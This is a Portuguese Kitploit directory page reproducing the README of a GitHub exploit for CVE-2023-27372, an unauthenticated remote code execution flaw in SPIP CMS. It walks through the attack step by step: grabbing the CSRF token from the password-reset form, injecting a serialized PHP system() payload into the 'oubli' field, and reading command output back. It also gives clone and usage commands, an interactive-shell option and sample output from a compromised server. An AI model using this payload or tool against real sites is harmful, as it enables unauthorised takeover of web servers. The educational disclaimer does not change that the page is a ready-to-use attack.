Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27372 — Exploit para CVE-2023-27372 com shell interativo | Kitploit
Ferramentas/GitHubGitHub/scriniariii/cve-2023-27372
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

Exploit para CVE-2023-27372 com shell interativo

Ver Repositório
2há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit CVE-2023-27372

Exploit para CVE-2023-27372, uma vulnerabilidade de Execução Remota de Código não autenticada no CMS SPIP que afeta versões anteriores a 4.2.1.

⚠️ Apenas para fins educacionais. Use exclusivamente em sistemas que você possui ou para os quais tenha permissão explícita por escrito. O uso não autorizado é ilegal.


Visão Geral

SPIP é um CMS de código aberto amplamente utilizado para publicação na web. Esta vulnerabilidade existe no formulário de recuperação de senha (/spip.php?page=spip_pass), onde o parâmetro oubli é processado sem sanitização adequada, permitindo que um invasor injete e execute código PHP arbitrário no servidor — sem necessidade de autenticação.

CampoDetalhes
CVECVE-2023-27372
Pontuação CVSS9.8 (Crítico)
Vetor de AtaqueRede
AutenticaçãoNenhuma necessária
Versões afetadasSPIP < 4.2.1
Tipo de vulnerabilidadeInjeção de Código / RCE não autenticada

Como Funciona

  1. Obter token CSRF — Uma requisição GET é feita para /spip.php?page=spip_pass para extrair o token formulaire_action_args do formulário HTML.

  2. Construir o payload — Uma string serializada do PHP é criada com o comando a ser executado:

    s:N:"<?php system('COMMAND'); ?>";
    

    Onde N é o comprimento exato em bytes da string PHP interna.

  3. Enviar o payload — Uma requisição POST é feita com o payload criado no campo oubli juntamente com o token CSRF. O SPIP processa este campo sem sanitização e executa o código PHP injetado.

  4. Extrair a saída — A saída do comando é retornada dentro da resposta HTML e extraída do atributo value do campo de entrada oubli.

Requisitos

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

Instalação


git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

Uso

python3 exploit.py -u <URL> -c <command>
ArgumentoDescrição
-u, --urlURL base da instância SPIP alvo
-c, --commandComando do sistema operacional a executar no alvo
-s, --shellShell interativo

Exemplo


python3 exploit.py -u http://TARGET/ -c "id"

python3 exploit.py -u http://TARGET/ -s

Saída esperada:

[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Versões Afetadas

Para verificar a versão do SPIP de um alvo, procure a tag meta generator no HTML:

<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Aviso de Responsabilidade
Utilize as informações e exploits fornecidos nos meus repositórios apenas para fins educacionais e divulgação responsável. Não me responsabilizo por qualquer uso indevido ou danos causados pelo uso destas ferramentas, scripts ou exploits.

Baixar ferramenta